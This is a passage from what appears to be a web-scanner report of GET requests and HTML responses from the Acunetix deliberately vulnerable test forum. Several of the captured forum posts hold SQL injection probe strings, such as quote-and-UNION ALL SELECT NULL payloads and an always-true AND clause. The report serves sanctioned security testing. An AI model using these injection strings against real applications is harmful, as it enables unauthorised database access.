Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showforum.asp?id=0 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:29 GMT Content-Length: 4150 |
| Response Body - size: 4,150 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum 42 </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D25" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/42 </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:32 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'>" UNION ALL select NULL -- </div></td></tr> </table> <!-- tinyMCE --> <script language="javascript" type="text/javascript" src="./jscripts/tiny_mce/tiny_mce.js"></script> <script language="javascript" type="text/javascript"> // Notice: The simple theme does not use all options some of them are limited to the advanced theme tinyMCE.init({ mode : "textareas", theme : "simple" }); </script> <!-- /tinyMCE --> <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> <table align="center" width="500px" cellpadding="5" cellspacing="0" class="FramedForm"> <tr> <td>Message subject <br> <center> <input name="tfSubject" type="text" class="postit" id="tfSubject"> </center></td> </tr> <tr> <td>Message text <br> <center> <textarea name="tfText" class="postit" id="tfText"></textarea> </center></td> </tr> <tr> <td align="right"><input type="submit" value="Post it"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/showthread.asp?id=26 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | private |
| Request Header - size: 337 bytes. |
GET http://testasp.vulnweb.com/showthread.asp?id=26 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showforum.asp?id=0 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:29 GMT Content-Length: 4150 |
| Response Body - size: 4,150 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum 42 </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D26" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/42 </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:32 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'>) UNION ALL select NULL -- </div></td></tr> </table> <!-- tinyMCE --> <script language="javascript" type="text/javascript" src="./jscripts/tiny_mce/tiny_mce.js"></script> <script language="javascript" type="text/javascript"> // Notice: The simple theme does not use all options some of them are limited to the advanced theme tinyMCE.init({ mode : "textareas", theme : "simple" }); </script> <!-- /tinyMCE --> <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> <table align="center" width="500px" cellpadding="5" cellspacing="0" class="FramedForm"> <tr> <td>Message subject <br> <center> <input name="tfSubject" type="text" class="postit" id="tfSubject"> </center></td> </tr> <tr> <td>Message text <br> <center> <textarea name="tfText" class="postit" id="tfText"></textarea> </center></td> </tr> <tr> <td align="right"><input type="submit" value="Post it"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/showthread.asp?id=27 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | private |
| Request Header - size: 337 bytes. |
GET http://testasp.vulnweb.com/showthread.asp?id=27 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showforum.asp?id=0 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:29 GMT Content-Length: 4151 |
| Response Body - size: 4,151 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum 42 </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D27" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/42 </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:33 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'>') UNION ALL select NULL -- </div></td></tr> </table> <!-- tinyMCE --> <script language="javascript" type="text/javascript" src="./jscripts/tiny_mce/tiny_mce.js"></script> <script language="javascript" type="text/javascript"> // Notice: The simple theme does not use all options some of them are limited to the advanced theme tinyMCE.init({ mode : "textareas", theme : "simple" }); </script> <!-- /tinyMCE --> <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> <table align="center" width="500px" cellpadding="5" cellspacing="0" class="FramedForm"> <tr> <td>Message subject <br> <center> <input name="tfSubject" type="text" class="postit" id="tfSubject"> </center></td> </tr> <tr> <td>Message text <br> <center> <textarea name="tfText" class="postit" id="tfText"></textarea> </center></td> </tr> <tr> <td align="right"><input type="submit" value="Post it"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/showthread.asp?id=28 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | private |
| Request Header - size: 337 bytes. |
GET http://testasp.vulnweb.com/showthread.asp?id=28 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showforum.asp?id=0 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:29 GMT Content-Length: 4151 |
| Response Body - size: 4,151 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum 42 </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D28" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/42 </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:33 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'>") UNION ALL select NULL -- </div></td></tr> </table> <!-- tinyMCE --> <script language="javascript" type="text/javascript" src="./jscripts/tiny_mce/tiny_mce.js"></script> <script language="javascript" type="text/javascript"> // Notice: The simple theme does not use all options some of them are limited to the advanced theme tinyMCE.init({ mode : "textareas", theme : "simple" }); </script> <!-- /tinyMCE --> <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> <table align="center" width="500px" cellpadding="5" cellspacing="0" class="FramedForm"> <tr> <td>Message subject <br> <center> <input name="tfSubject" type="text" class="postit" id="tfSubject"> </center></td> </tr> <tr> <td>Message text <br> <center> <textarea name="tfText" class="postit" id="tfText"></textarea> </center></td> </tr> <tr> <td align="right"><input type="submit" value="Post it"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/showthread.asp?id=29 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | private |
| Request Header - size: 337 bytes. |
GET http://testasp.vulnweb.com/showthread.asp?id=29 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showforum.asp?id=0 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:29 GMT Content-Length: 4132 |
| Response Body - size: 4,132 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum 42 </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D29" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/42 </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:33 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'> ASC -- </div></td></tr> </table> <!-- tinyMCE --> <script language="javascript" type="text/javascript" src="./jscripts/tiny_mce/tiny_mce.js"></script> <script language="javascript" type="text/javascript"> // Notice: The simple theme does not use all options some of them are limited to the advanced theme tinyMCE.init({ mode : "textareas", theme : "simple" }); </script> <!-- /tinyMCE --> <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> <table align="center" width="500px" cellpadding="5" cellspacing="0" class="FramedForm"> <tr> <td>Message subject <br> <center> <input name="tfSubject" type="text" class="postit" id="tfSubject"> </center></td> </tr> <tr> <td>Message text <br> <center> <textarea name="tfText" class="postit" id="tfText"></textarea> </center></td> </tr> <tr> <td align="right"><input type="submit" value="Post it"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/showthread.asp?id=3 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | private |
| Request Header - size: 336 bytes. |
GET http://testasp.vulnweb.com/showthread.asp?id=3 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showforum.asp?id=0 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:25 GMT Content-Length: 4139 |
| Response Body - size: 4,139 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum 42 </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D3" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/42 </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:28 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'>' AND '1'='1' -- </div></td></tr> </table> <!-- tinyMCE --> <script language="javascript" type="text/javascript" src="./jscripts/tiny_mce/tiny_mce.js"></script> <script language="javascript" type="text/javascript"> // Notice: The simple theme does not use all options some of them are limited to the advanced theme tinyMCE.init({ mode : "textareas", theme : "simple" }); </script> <!-- /tinyMCE --> <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> <table align="center" width="500px" cellpadding="5" cellspacing="0" class="FramedForm"> <tr> <td>Message subject <br> <center> <input name="tfSubject" type="text" class="postit" id="tfSubject"> </center></td> </tr> <tr> <td>Message text <br> <center> <textarea name="tfText" class="postit" id="tfText"></textarea> </center></td> </tr> <tr> <td align="right"><input type="submit" value="Post it"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/showthread.asp?id=30 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | private |
| Request Header - size: 337 bytes. |
GET http://testasp.vulnweb.com/showthread.asp?id=30 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showforum.asp?id=0 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:30 GMT Content-Length: 4131 |
| Response Body - size: 4,131 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum 42 </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D30" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/42 </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:13:43 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'>sa19agqc</div></td></tr> </table> <!-- tinyMCE --> <script language="javascript" type="text/javascript" src="./jscripts/tiny_mce/tiny_mce.js"></script> <script language="javascript" type="text/javascript"> // Notice: The simple theme does not use all options some of them are limited to the advanced theme tinyMCE.init({ mode : "textareas", theme : "simple" }); </script> <!-- /tinyMCE --> <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> <table align="center" width="500px" cellpadding="5" cellspacing="0" class="FramedForm"> <tr> <td>Message subject <br> <center> <input name="tfSubject" type="text" class="postit" id="tfSubject"> </center></td> </tr> <tr> <td>Message text <br> <center> <textarea name="tfText" class="postit" id="tfText"></textarea> </center></td> </tr> <tr> <td align="right"><input type="submit" value="Post it"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/showthread.asp?id=31 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | private |
| Request Header - size: 337 bytes. |
GET http://testasp.vulnweb.com/showthread.asp?id=31 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showforum.asp?id=0 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
